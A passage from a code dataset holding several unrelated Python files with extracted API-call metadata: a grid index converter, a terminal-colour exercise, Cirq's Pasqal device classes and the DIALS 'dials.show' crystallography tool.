        self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)]
        self._zerodim = np.zeros((self.ndim,))
        self.nbins = int(np.rint((ngrid - 1) ** ndim))

    def convert_to_vector(self, grid):
        if grid.shape[0] != self.ngrid - 1:
            raise Exception("Wrong dimension of grid. Expect length of %s got %s" % (self.ngrid - 1, grid.shape[0]))
        vector = np.empty((self.nbins,))
        for bin_idx in range(self.nbins):
            vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))]
        return vector

    def convert_to_grid(self, vector):
        grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1))
        if len(vector.shape) > 1:
            grids = np.empty((len(vector),) + grid_shape)
            for idx, v in enumerate(vector):
                grids[idx] = self.convert_to_grid(v)
            return grids
        else:
            grid = np.zeros(grid_shape)
            for idx in range(len(vector)):
                grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx]
            return grid

    def convert_to_grid_idx(self, bin_idx):
        if bin_idx >= self.nbins or bin_idx < 0:
            print(self.nbins, self.ndim, self.nbins ** self.ndim)
            raise Exception("Invalid index %s. You are probably outside the grid..." % bin_idx)
        grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1)
        return grid_idx.astype(int)

    def convert_to_bin_idx(self, grid_idx):
        bin_idx = utils.rint(np.sum(grid_idx * self._modulus))
        if bin_idx >= self.nbins or bin_idx < 0:
            raise Exception(
                "Invalid bin index %s. You are probably outside the grid. Size:%s" % (bin_idx, self.nbins))
        return bin_idx
[((6, 0, 10, 32), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((13, 9, 13, 44), 'logging.getLogger', 'logging.getLogger', ({(13, 27, 13, 43): '"""indexconverter"""'}, {}), "('indexconverter')", False, 'import logging\n'), ((21, 24, 21, 46), 'numpy.zeros', 'np.zeros', ({(21, 33, 21, 45): '(self.ndim,)'}, {}), '((self.ndim,))', True, 'import numpy as np\n'), ((27, 17, 27, 40), 'numpy.empty', 'np.empty', ({(27, 26, 27, 39): '(self.nbins,)'}, {}), '((self.nbins,))', True, 'import numpy as np\n'), ((22, 25, 22, 53), 'numpy.rint', 'np.rint', ({(22, 33, 22, 52): '(ngrid - 1) ** ndim'}, {}), '((ngrid - 1) ** ndim)', True, 'import numpy as np\n'), ((40, 19, 40, 39), 'numpy.zeros', 'np.zeros', ({(40, 28, 40, 38): 'grid_shape'}, {}), '(grid_shape)', True, 'import numpy as np\n'), ((53, 29, 53, 61), 'numpy.sum', 'np.sum', ({(53, 36, 53, 60): 'grid_idx * self._modulus'}, {}), '(grid_idx * self._modulus)', True, 'import numpy as np\n'), ((33, 27, 33, 46), 'numpy.zeros', 'np.zeros', ({(33, 36, 33, 45): 'self.ndim'}, {}), '(self.ndim)', True, 'import numpy as np\n')]
andersontmachado/ExerciciosPython
Ex029 Aula 11-Cores no Terminal.py
ebd93eb4127dadedee8b719ccc4bc20fc151d0ad
print('\033[7;30mOla mundo\033[m!!!')
[]
pavoljuhas/Cirq
cirq-pasqal/cirq_pasqal/pasqal_device.py
b6d6577be61d216ce2f29f8c64ae5879cf3087d5
# Copyright 2020 The Cirq Developers # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict import numpy as np import networkx as nx import cirq from cirq import _compat, GridQubit, LineQubit from cirq.ops import NamedQubit from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset @cirq.value.value_equality class PasqalDevice(cirq.devices.Device): """A generic Pasqal device. The most general of Pasqal devices, enforcing only restrictions expected to be shared by all future devices. Serves as the parent class of all Pasqal devices, but can also be used on its own for hosting a nearly unconstrained device. When used as a circuit's device, the qubits have to be of the type cirq.NamedQubit and assumed to be all connected, the idea behind it being that after submission, all optimization and transpilation necessary for its execution on the specified device are handled internally by Pasqal. """ def __init__(self, qubits: Sequence[cirq.Qid]) -> None: """Initializes a device with some qubits. Args: qubits (NamedQubit): Qubits on the device, exclusively unrelated to a physical position. Raises: TypeError: If the wrong qubit type is provided. ValueError: If the number of qubits is greater than the devices maximum. """ if len(qubits) > 0: q_type = type(qubits[0]) for q in qubits: if not isinstance(q, self.supported_qubit_type): raise TypeError( 'Unsupported qubit type: {!r}. This device ' 'supports qubit types: {}'.format(q, self.supported_qubit_type) ) if not type(q) is q_type: raise TypeError("All qubits must be of same type.") if len(qubits) > self.maximum_qubit_number: raise ValueError( 'Too many qubits. {} accepts at most {} ' 'qubits.'.format(type(self), self.maximum_qubit_number) ) self.gateset = PasqalGateset() self.qubits = qubits self._metadata = cirq.DeviceMetadata( qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b]) ) # pylint: enable=missing-raises-doc @property def supported_qubit_type(self): return (NamedQubit,) @property def maximum_qubit_number(self): return 100 @property def metadata(self): return self._metadata @_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15') def qubit_set(self) -> FrozenSet[cirq.Qid]: return frozenset(self.qubits) def qubit_list(self): return [qubit for qubit in self.qubits] def is_pasqal_device_op(self, op: cirq.Operation) -> bool: if not isinstance(op, cirq.Operation): raise ValueError('Got unknown operation:', op) return op in self.gateset def validate_operation(self, operation: cirq.Operation): """Raises an error if the given operation is invalid on this device. Args: operation: The operation to validate. Raises: ValueError: If the operation is not valid. NotImplementedError: If the operation is a measurement with an invert mask. 
""" if not isinstance(operation, cirq.GateOperation): raise ValueError("Unsupported operation") if not self.is_pasqal_device_op(operation): raise ValueError(f'{operation.gate!r} is not a supported gate') for qub in operation.qubits: if not isinstance(qub, self.supported_qubit_type): raise ValueError( '{} is not a valid qubit for gate {!r}. This ' 'device accepts gates on qubits of type: ' '{}'.format(qub, operation.gate, self.supported_qubit_type) ) if qub not in self.metadata.qubit_set: raise ValueError(f'{qub} is not part of the device.') if isinstance(operation.gate, cirq.MeasurementGate): if operation.gate.invert_mask != (): raise NotImplementedError( "Measurements on Pasqal devices don't support invert_mask." ) def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None: """Raises an error if the given circuit is invalid on this device. A circuit is invalid if any of its moments are invalid or if there is a non-empty moment after a moment with a measurement. Args: circuit: The circuit to validate Raises: ValueError: If the given circuit can't be run on this device """ super().validate_circuit(circuit) # Measurements must be in the last non-empty moment has_measurement_occurred = False for moment in circuit: if has_measurement_occurred: if len(moment.operations) > 0: raise ValueError("Non-empty moment after measurement") for operation in moment.operations: if isinstance(operation.gate, cirq.MeasurementGate): has_measurement_occurred = True def __repr__(self): return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})' def _value_equality_values_(self): return self.qubits def _json_dict_(self): return cirq.protocols.obj_to_dict_helper(self, ['qubits']) class PasqalVirtualDevice(PasqalDevice): """A Pasqal virtual device with qubits in 3d. A virtual representation of a Pasqal device, enforcing the constraints typically found in a physical device. The qubits can be positioned in 3d space, although 2d layouts will be supported sooner and are thus recommended. Only accepts qubits with physical placement. """ def __init__( self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]] ) -> None: """Initializes a device with some qubits. Args: control_radius: the maximum distance between qubits for a controlled gate. Distance is measured in units of the coordinates passed into the qubit constructor. qubits: Qubits on the device, identified by their x, y, z position. Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit. Raises: ValueError: if the wrong qubit type is provided or if invalid parameter is provided for control_radius.""" super().__init__(qubits) if not control_radius >= 0: raise ValueError('Control_radius needs to be a non-negative float.') if len(self.qubits) > 1: if control_radius > 3.0 * self.minimal_distance(): raise ValueError( 'Control_radius cannot be larger than 3 times' ' the minimal distance between qubits.' ) self.control_radius = control_radius self.gateset = PasqalGateset(include_additional_controlled_ops=False) self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate)) @property def supported_qubit_type(self): return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit) def validate_operation(self, operation: cirq.Operation): """Raises an error if the given operation is invalid on this device. 
Args: operation: the operation to validate Raises: ValueError: If the operation is not valid """ super().validate_operation(operation) # Verify that a controlled gate operation is valid if operation in self.controlled_gateset: for p in operation.qubits: for q in operation.qubits: if self.distance(p, q) > self.control_radius: raise ValueError(f"Qubits {p!r}, {q!r} are too far away") def validate_moment(self, moment: cirq.Moment): """Raises an error if the given moment is invalid on this device. Args: moment: The moment to validate. Raises: ValueError: If the given moment is invalid. """ super().validate_moment(moment) if len(moment) > 1: for operation in moment: if not isinstance(operation.gate, cirq.MeasurementGate): raise ValueError("Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.") def minimal_distance(self) -> float: """Returns the minimal distance between two qubits in qubits. Args: qubits: qubit involved in the distance computation Raises: ValueError: If the device has only one qubit Returns: The minimal distance between qubits, in spacial coordinate units. """ if len(self.qubits) <= 1: raise ValueError("Two qubits to compute a minimal distance.") return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2]) def distance(self, p: Any, q: Any) -> float: """Returns the distance between two qubits. Args: p: qubit involved in the distance computation q: qubit involved in the distance computation Raises: ValueError: If p or q not part of the device Returns: The distance between qubits p and q. """ all_qubits = self.qubit_list() if p not in all_qubits or q not in all_qubits: raise ValueError("Qubit not part of the device.") if isinstance(p, GridQubit): return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2) if isinstance(p, LineQubit): return abs(p.x - q.x) return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2) def __repr__(self): return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format( self.control_radius, sorted(self.qubits) ) def _value_equality_values_(self) -> Any: return (self.control_radius, self.qubits) def _json_dict_(self) -> Dict[str, Any]: return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits']) @_compat.deprecated_class( deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).' ) class PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates): """A gate converter for compatibility with Pasqal processors. Modified version of ConvertToNeutralAtomGates, where a new 'convert' method 'pasqal_convert' takes the 'keep' function as an input. """ def pasqal_convert( self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool] ) -> List[cirq.Operation]: def on_stuck_raise(bad): return TypeError( "Don't know how to work with {!r}. " "It isn't a native PasqalDevice operation, " "a 1 or 2 qubit gate with a known unitary, " "or composite.".format(bad) ) return cirq.protocols.decompose( op, keep=keep, intercepting_decomposer=self._convert_one, on_stuck_raise=None if self.ignore_failures else on_stuck_raise, )
[((295, 1, 297, 1), 'cirq._compat.deprecated_class', '_compat.deprecated_class', (), '', False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((85, 5, 85, 88), 'cirq._compat.deprecated', '_compat.deprecated', (), '', False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((66, 23, 66, 38), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ({}, {}), '()', False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((162, 15, 162, 66), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', ({(162, 49, 162, 53): 'self', (162, 55, 162, 65): "['qubits']"}, {}), "(self, ['qubits'])", False, 'import cirq\n'), ((202, 23, 202, 77), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', (), '', False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((281, 15, 281, 78), 'numpy.sqrt', 'np.sqrt', ({(281, 23, 281, 77): '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)'}, {}), '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)', True, 'import numpy as np\n'), ((292, 15, 292, 84), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', ({(292, 49, 292, 53): 'self', (292, 55, 292, 83): "['control_radius', 'qubits']"}, {}), "(self, ['control_radius', 'qubits'])", False, 'import cirq\n'), ((316, 15, 321, 9), 'cirq.protocols.decompose', 'cirq.protocols.decompose', (), '', False, 'import cirq\n'), ((69, 20, 69, 88), 'networkx.from_edgelist', 'nx.from_edgelist', ({(69, 37, 69, 87): '[(a, b) for a in qubits for b in qubits if a != b]'}, {}), '([(a, b) for a in qubits for b in qubits if a != b])', True, 'import networkx as nx\n'), ((203, 47, 203, 93), 'cirq.AnyIntegerPowerGateFamily', 'cirq.AnyIntegerPowerGateFamily', ({(203, 78, 203, 92): 'cirq.CZPowGate'}, {}), '(cirq.CZPowGate)', False, 'import cirq\n'), ((276, 19, 276, 71), 'numpy.sqrt', 'np.sqrt', ({(276, 27, 276, 70): '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)'}, {}), '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)', True, 'import numpy as np\n')]
huwjenkins/dials
command_line/show.py
885a2f6ea3900dd0c9fcc15c03561fb45452c3bb
import os import sys import numpy as np import iotbx.phil from cctbx import uctbx from dxtbx.model.experiment_list import ExperimentListFactory from scitbx.math import five_number_summary import dials.util from dials.array_family import flex from dials.util import Sorry, tabulate help_message = """ Examples:: dials.show models.expt dials.show image_*.cbf dials.show observations.refl """ phil_scope = iotbx.phil.parse( """\ show_scan_varying = False .type = bool .help = "Whether or not to show the crystal at each scan point." show_shared_models = False .type = bool .help = "Show which models are linked to which experiments" show_all_reflection_data = False .type = bool .help = "Whether or not to print individual reflections" show_intensities = False .type = bool show_centroids = False .type = bool show_profile_fit = False .type = bool show_flags = False .type = bool .help = "Show a summary table of reflection flags" show_identifiers = False .type = bool .help = "Show experiment identifiers map if set" image_statistics{ show_corrected = False .type = bool .help = "Show statistics on the distribution of values in each corrected image" show_raw = False .type = bool .help = "Show statistics on the distribution of values in each raw image" } max_reflections = None .type = int .help = "Limit the number of reflections in the output." """, process_includes=True, ) def beam_centre_mm(detector, s0): x, y = (None, None) for panel_id, panel in enumerate(detector): try: x, y = panel.get_ray_intersection(s0) except RuntimeError: continue else: if panel.is_coord_valid_mm((x, y)): break else: x, y = (None, None) return panel_id, (x, y) def beam_centre_raw_image_px(detector, s0): panel_id, (x, y) = beam_centre_mm(detector, s0) panel = detector[panel_id] x_px, y_px = panel.millimeter_to_pixel((x, y)) offset = panel.get_raw_image_offset() return x_px + offset[0], y_px + offset[1] def show_beam(detector, beam): # standard static beam model string s = str(beam) # report whether the beam is scan-varying if beam.num_scan_points > 0: s += " s0 sampled at " + str(beam.num_scan_points) + " scan points\n" # add static model beam centres panel_id, (x, y) = beam_centre_mm(detector, beam.get_s0()) if panel_id >= 0 and x is not None and y is not None: x_px, y_px = detector[panel_id].millimeter_to_pixel((x, y)) if len(detector) > 1: beam_centre_mm_str = " mm: panel %i, (%.2f,%.2f)" % (panel_id, x, y) beam_centre_px_str = " px: panel %i, (%.2f,%.2f)" % ( panel_id, x_px, y_px, ) x_raw_px, y_raw_px = beam_centre_raw_image_px(detector, beam.get_s0()) beam_centre_raw_px_str = " px, raw image: ({:.2f},{:.2f})".format( x_raw_px, y_raw_px, ) x_raw_mm, y_raw_mm = detector[panel_id].pixel_to_millimeter( (x_raw_px, y_raw_px) ) beam_centre_raw_mm_str = " mm, raw image: ({:.2f},{:.2f})".format( x_raw_mm, y_raw_mm, ) else: beam_centre_mm_str = f" mm: ({x:.2f},{y:.2f})" beam_centre_px_str = f" px: ({x_px:.2f},{y_px:.2f})" beam_centre_raw_px_str = "" beam_centre_raw_mm_str = "" s += "\nBeam centre: \n" s += beam_centre_mm_str + "\n" + beam_centre_px_str + "\n" if beam_centre_raw_mm_str: s += beam_centre_raw_mm_str + "\n" if beam_centre_raw_px_str: s += beam_centre_raw_px_str + "\n" # report range of scan-varying model beam centres if beam.num_scan_points > 0: # get scan-varying beam centres, ensuring all on same panel sv_s0 = beam.get_s0_at_scan_points() impacts = [beam_centre_mm(detector, s0) for s0 in sv_s0] pnl, xy = zip(*impacts) uniq_pnls = set(pnl) if len(uniq_pnls) > 1 or min(uniq_pnls) < 0: return s if any(e == (None, None) for e 
in xy): return s pnl = list(uniq_pnls)[0] x_mm, y_mm = zip(*xy) # convert to pixels xy = [detector[pnl].millimeter_to_pixel(e) for e in xy] x_px, y_px = zip(*xy) s += "Beam centre range (mm): ([{:.2f},{:.2f}],[{:.2f},{:.2f}])\n".format( min(x_mm), max(x_mm), min(y_mm), max(y_mm), ) s += "Beam centre range (px): ([{:.2f},{:.2f}],[{:.2f},{:.2f}])\n".format( min(x_px), max(x_px), min(y_px), max(y_px), ) return s def show_goniometer(goniometer): # standard static goniometer model string s = str(goniometer) # report whether the goniometer is scan-varying if goniometer.num_scan_points > 0: s += ( " Setting rotation sampled at " + str(goniometer.num_scan_points) + " scan points\n" ) return s @dials.util.show_mail_handle_errors() def run(args=None): import dials.util.log dials.util.log.print_banner() from dials.util.options import OptionParser, reflections_and_experiments_from_files usage = "dials.show [options] models.expt | image_*.cbf" parser = OptionParser( usage=usage, phil=phil_scope, read_experiments=True, read_experiments_from_images=True, read_reflections=True, check_format=False, epilog=help_message, ) params, options = parser.parse_args(args=args, show_diff_phil=True) reflections, experiments = reflections_and_experiments_from_files( params.input.reflections, params.input.experiments ) if len(experiments) == 0 and len(reflections) == 0: parser.print_help() exit() if len(experiments): if not all(e.detector for e in experiments): sys.exit("Error: experiment has no detector") if not all(e.beam for e in experiments): sys.exit("Error: experiment has no beam") print(show_experiments(experiments, show_scan_varying=params.show_scan_varying)) if params.image_statistics.show_raw: show_image_statistics(experiments, "raw") if params.image_statistics.show_corrected: show_image_statistics(experiments, "corrected") if params.show_shared_models: print() print(model_connectivity(experiments)) if len(reflections): print( show_reflections( reflections, show_intensities=params.show_intensities, show_profile_fit=params.show_profile_fit, show_centroids=params.show_centroids, show_all_reflection_data=params.show_all_reflection_data, show_flags=params.show_flags, max_reflections=params.max_reflections, show_identifiers=params.show_identifiers, ) ) def show_experiments(experiments, show_scan_varying=False): text = [] for i_expt, expt in enumerate(experiments): text.append("Experiment %i:" % i_expt) format_class = expt.imageset.get_format_class() if format_class.__name__ != "Format": text.append(f"Format class: {format_class.__name__}") if expt.identifier != "": text.append(f"Experiment identifier: {expt.identifier}") try: template = expt.imageset.get_template() except AttributeError: template = None if template: text.append(f"Image template: {template}") text.append(str(expt.detector)) text.append( "Max resolution (at corners): %f" % (expt.detector.get_max_resolution(expt.beam.get_s0())) ) text.append( "Max resolution (inscribed): %f" % (expt.detector.get_max_inscribed_resolution(expt.beam.get_s0())) ) text.append("") text.append(show_beam(expt.detector, expt.beam)) if expt.scan is not None: text.append(str(expt.scan)) if expt.goniometer is not None: text.append(show_goniometer(expt.goniometer)) if expt.crystal is not None: text.append(expt.crystal.as_str(show_scan_varying=show_scan_varying)) if expt.crystal.num_scan_points: abc = flex.vec3_double() angles = flex.vec3_double() for n in range(expt.crystal.num_scan_points): ( a, b, c, alpha, beta, gamma, ) = 
expt.crystal.get_unit_cell_at_scan_point(n).parameters() abc.append((a, b, c)) angles.append((alpha, beta, gamma)) a, b, c = abc.mean() alpha, beta, gamma = angles.mean() mean_unit_cell = uctbx.unit_cell((a, b, c, alpha, beta, gamma)) text.append(f" Average unit cell: {mean_unit_cell}") if expt.profile is not None: text.append(str(expt.profile)) if expt.scaling_model is not None: text.append(str(expt.scaling_model)) return "\n".join(text) def show_image_statistics(experiments, im_type): if im_type == "raw": raw = True elif im_type == "corrected": raw = False else: raise ValueError(f"Unknown im_type: {im_type}") # To show image statistics, check_format has to be true. So we have to reinstatiate # the experiment list here try: experiments = ExperimentListFactory.from_json( experiments.as_json(), check_format=True ) except OSError as e: raise Sorry( f"Unable to read image data. Please check {e.filename} is accessible" ) print(f"Five number summary of the {im_type} images") for i_expt, expt in enumerate(experiments): for i in range(len(expt.imageset)): identifier = os.path.basename(expt.imageset.get_image_identifier(i)) if raw: pnl_data = expt.imageset.get_raw_data(i) else: pnl_data = expt.imageset.get_corrected_data(i) if not isinstance(pnl_data, tuple): pnl_data = (pnl_data,) flat_data = pnl_data[0].as_1d() for p in pnl_data[1:]: flat_data.extend(p.as_1d()) fns = five_number_summary(flat_data) print( "{}: Min: {:.1f} Q1: {:.1f} Med: {:.1f} Q3: {:.1f} Max: {:.1f}".format( identifier, *fns ) ) def model_connectivity(experiments): def model_connectivity_impl(experiments, model): text = [""] text.append(f"{model.capitalize()}:") models = getattr(experiments, f"{model}s")() rows = [[""] + [str(j) for j in range(len(models))]] for j, e in enumerate(experiments): row = ["Experiment %d" % j] for m in models: if getattr(e, model) is m: row.append("x") else: row.append(".") rows.append(row) text.append(tabulate(rows, tablefmt="plain")) return text if len(experiments) == 1: return "" text = [] text.append("Experiment / Models") text.extend(model_connectivity_impl(experiments, "detector")) text.extend(model_connectivity_impl(experiments, "crystal")) text.extend(model_connectivity_impl(experiments, "beam")) return "\n".join(text) def _create_flag_count_table(table): """Generate a summary table of flag values in a reflection table. :param table: A reflection table :returns: A string of the formatted flags table """ # Calculate the counts of entries that match each flag numpy_flags = table["flags"].as_numpy_array() flag_count = { flag: np.sum(numpy_flags & value != 0) for value, flag in table.flags.values.items() } # Work out the numeric-value order of the flags flag_order = sorted(table.flags.values.values(), key=lambda x: x.real) # Build the actual table flag_rows = [["Flag", "Count", "%"]] max_count_len = max(5, len(str(max(flag_count.values())))) last_flag = None for flag in flag_order: indent = "" # As a hint for reading, indent any 'summary' flags. # A summary flag is any flag which overlaps with the previous one. 
if last_flag and (last_flag.real & flag.real): indent = " " last_flag = flag # Add the row to the table we're building flag_rows.append( [ indent + flag.name, "{:{:d}d}".format(flag_count[flag], max_count_len), f"{100 * flag_count[flag] / len(table):5.01f}", ] ) # Build the array of output strings text = [] text.append("Reflection flags:") text.append(tabulate(flag_rows, headers="firstrow")) return "\n".join(text) def show_reflections( reflections, show_intensities=False, show_profile_fit=False, show_centroids=False, show_all_reflection_data=False, show_flags=False, max_reflections=None, show_identifiers=False, ): text = [] from orderedset import OrderedSet formats = { "miller_index": "%i, %i, %i", "d": "%.2f", "qe": "%.3f", "dqe": "%.3f", "id": "%i", "imageset_id": "%i", "panel": "%i", "flags": "%i", "background.mean": "%.1f", "background.dispersion": "%.1f", "background.mse": "%.1f", "background.sum.value": "%.1f", "background.sum.variance": "%.1f", "intensity.prf.value": "%.1f", "intensity.prf.variance": "%.1f", "intensity.sum.value": "%.1f", "intensity.sum.variance": "%.1f", "intensity.cor.value": "%.1f", "intensity.cor.variance": "%.1f", "intensity.scale.value": "%.1f", "intensity.scale.variance": "%.1f", "Ih_values": "%.1f", "lp": "%.3f", "num_pixels.background": "%i", "num_pixels.background_used": "%i", "num_pixels.foreground": "%i", "num_pixels.valid": "%i", "partial_id": "%i", "partiality": "%.4f", "profile.correlation": "%.3f", "profile.rmsd": "%.3f", "xyzcal.mm": "%.2f, %.2f, %.2f", "xyzcal.px": "%.2f, %.2f, %.2f", "delpsical.rad": "%.3f", "delpsical2": "%.3f", "delpsical.weights": "%.3f", "xyzobs.mm.value": "%.2f, %.2f, %.2f", "xyzobs.mm.variance": "%.4e, %.4e, %.4e", "xyzobs.px.value": "%.2f, %.2f, %.2f", "xyzobs.px.variance": "%.4f, %.4f, %.4f", "s1": "%.4f, %.4f, %.4f", "s2": "%.4f, %.4f, %.4f", "shoebox": "%.1f", "rlp": "%.4f, %.4f, %.4f", "zeta": "%.3f", "x_resid": "%.3f", "x_resid2": "%.3f", "y_resid": "%.3f", "y_resid2": "%.3f", "kapton_absorption_correction": "%.3f", "kapton_absorption_correction_sigmas": "%.3f", "inverse_scale_factor": "%.3f", "inverse_scale_factor_variance": "%.3f", } for rlist in reflections: from dials.algorithms.shoebox import MaskCode foreground_valid = MaskCode.Valid | MaskCode.Foreground text.append("") text.append(f"Reflection list contains {len(rlist)} reflections") if len(rlist) == 0: continue rows = [["Column", "min", "max", "mean"]] for k, col in rlist.cols(): if k in formats and "%" not in formats.get(k, "%s"): # Allow blanking out of entries that wouldn't make sense rows.append( [ k, formats.get(k, "%s"), formats.get(k, "%s"), formats.get(k, "%s"), ] ) elif type(col) in (flex.double, flex.int, flex.size_t): if type(col) in (flex.int, flex.size_t): col = col.as_double() rows.append( [ k, formats.get(k, "%s") % flex.min(col), formats.get(k, "%s") % flex.max(col), formats.get(k, "%s") % flex.mean(col), ] ) elif type(col) in (flex.vec3_double, flex.miller_index): if isinstance(col, flex.miller_index): col = col.as_vec3_double() rows.append( [ k, formats.get(k, "%s") % col.min(), formats.get(k, "%s") % col.max(), formats.get(k, "%s") % col.mean(), ] ) elif isinstance(col, flex.shoebox): rows.append([k, "", "", ""]) si = col.summed_intensity().observed_value() rows.append( [ " summed I", formats.get(k, "%s") % flex.min(si), formats.get(k, "%s") % flex.max(si), formats.get(k, "%s") % flex.mean(si), ] ) x1, x2, y1, y2, z1, z2 = col.bounding_boxes().parts() bbox_sizes = ((z2 - z1) * (y2 - y1) * (x2 - x1)).as_double() rows.append( [ " N pix", 
formats.get(k, "%s") % flex.min(bbox_sizes), formats.get(k, "%s") % flex.max(bbox_sizes), formats.get(k, "%s") % flex.mean(bbox_sizes), ] ) fore_valid = col.count_mask_values(foreground_valid).as_double() rows.append( [ " N valid foreground pix", formats.get(k, "%s") % flex.min(fore_valid), formats.get(k, "%s") % flex.max(fore_valid), formats.get(k, "%s") % flex.mean(fore_valid), ] ) text.append(tabulate(rows, headers="firstrow")) if show_flags: text.append(_create_flag_count_table(rlist)) if show_identifiers: if rlist.experiment_identifiers(): text.append( """Experiment identifiers id-map values:\n%s""" % ( "\n".join( "id:" + str(k) + " -> experiment identifier:" + str(rlist.experiment_identifiers()[k]) for k in rlist.experiment_identifiers().keys() ) ) ) intensity_keys = ( "miller_index", "d", "intensity.prf.value", "intensity.prf.variance", "intensity.sum.value", "intensity.sum.variance", "background.mean", "profile.correlation", "profile.rmsd", ) profile_fit_keys = ("miller_index", "d") centroid_keys = ( "miller_index", "d", "xyzcal.mm", "xyzcal.px", "xyzobs.mm.value", "xyzobs.mm.variance", "xyzobs.px.value", "xyzobs.px.variance", ) keys_to_print = OrderedSet() if show_intensities: for k in intensity_keys: keys_to_print.add(k) if show_profile_fit: for k in profile_fit_keys: keys_to_print.add(k) if show_centroids: for k in centroid_keys: keys_to_print.add(k) if show_all_reflection_data: for k in formats: keys_to_print.add(k) def format_column(key, data, format_strings=None): if isinstance(data, flex.vec3_double): c_strings = [ c.as_string(format_strings[i].strip()) for i, c in enumerate(data.parts()) ] elif isinstance(data, flex.miller_index): c_strings = [ c.as_string(format_strings[i].strip()) for i, c in enumerate(data.as_vec3_double().parts()) ] elif isinstance(data, flex.size_t): c_strings = [data.as_int().as_string(format_strings[0].strip())] elif isinstance(data, flex.shoebox): x1, x2, y1, y2, z1, z2 = data.bounding_boxes().parts() bbox_sizes = ((z2 - z1) * (y2 - y1) * (x2 - x1)).as_double() c_strings = [bbox_sizes.as_string(format_strings[0].strip())] key += " (N pix)" else: c_strings = [data.as_string(format_strings[0].strip())] column = flex.std_string() max_element_lengths = [c.max_element_length() for c in c_strings] for i in range(len(c_strings[0])): column.append( f"%{len(key)}s" % ", ".join( ("%%%is" % max_element_lengths[j]) % c_strings[j][i] for j in range(len(c_strings)) ) ) return column if keys_to_print: keys = [k for k in keys_to_print if k in rlist] if max_reflections is not None: max_reflections = min(len(rlist), max_reflections) else: max_reflections = len(rlist) columns = [] for k in keys: columns.append( format_column(k, rlist[k], format_strings=formats[k].split(",")) ) text.append("") text.append("Printing %i of %i reflections:" % (max_reflections, len(rlist))) line = [] for j in range(len(columns)): key = keys[j] if key == "shoebox": key += " (N pix)" width = max(len(key), columns[j].max_element_length()) line.append("%%%is" % width % key) text.append(" ".join(line)) for i in range(max_reflections): line = (c[i] for c in columns) text.append(" ".join(line)) return "\n".join(text) if __name__ == "__main__": run()
[((193, 13, 201, 5), 'dials.util.options.OptionParser', 'OptionParser', (), '', False, 'from dials.util.options import OptionParser, reflections_and_experiments_from_files\n'), ((204, 31, 206, 5), 'dials.util.options.reflections_and_experiments_from_files', 'reflections_and_experiments_from_files', ({(205, 8, 205, 32): 'params.input.reflections', (205, 34, 205, 58): 'params.input.experiments'}, {}), '(params.input.reflections, params.\n input.experiments)', False, 'from dials.util.options import OptionParser, reflections_and_experiments_from_files\n'), ((609, 20, 609, 32), 'orderedset.OrderedSet', 'OrderedSet', ({}, {}), '()', False, 'from orderedset import OrderedSet\n'), ((384, 14, 384, 46), 'numpy.sum', 'np.sum', ({(384, 21, 384, 45): '(numpy_flags & value != 0)'}, {}), '(numpy_flags & value != 0)', True, 'import numpy as np\n'), ((414, 16, 414, 55), 'dials.util.tabulate', 'tabulate', (), '', False, 'from dials.util import Sorry, tabulate\n'), ((645, 17, 645, 34), 'dials.array_family.flex.std_string', 'flex.std_string', ({}, {}), '()', False, 'from dials.array_family import flex\n'), ((214, 12, 214, 57), 'sys.exit', 'sys.exit', ({(214, 21, 214, 56): '"""Error: experiment has no detector"""'}, {}), "('Error: experiment has no detector')", False, 'import sys\n'), ((216, 12, 216, 53), 'sys.exit', 'sys.exit', ({(216, 21, 216, 52): '"""Error: experiment has no beam"""'}, {}), "('Error: experiment has no beam')", False, 'import sys\n'), ((320, 14, 322, 9), 'dials.util.Sorry', 'Sorry', ({(321, 12, 321, 81): 'f"""Unable to read image data. Please check {e.filename} is accessible"""'}, {}), "(f'Unable to read image data. Please check {e.filename} is accessible')", False, 'from dials.util import Sorry, tabulate\n'), ((337, 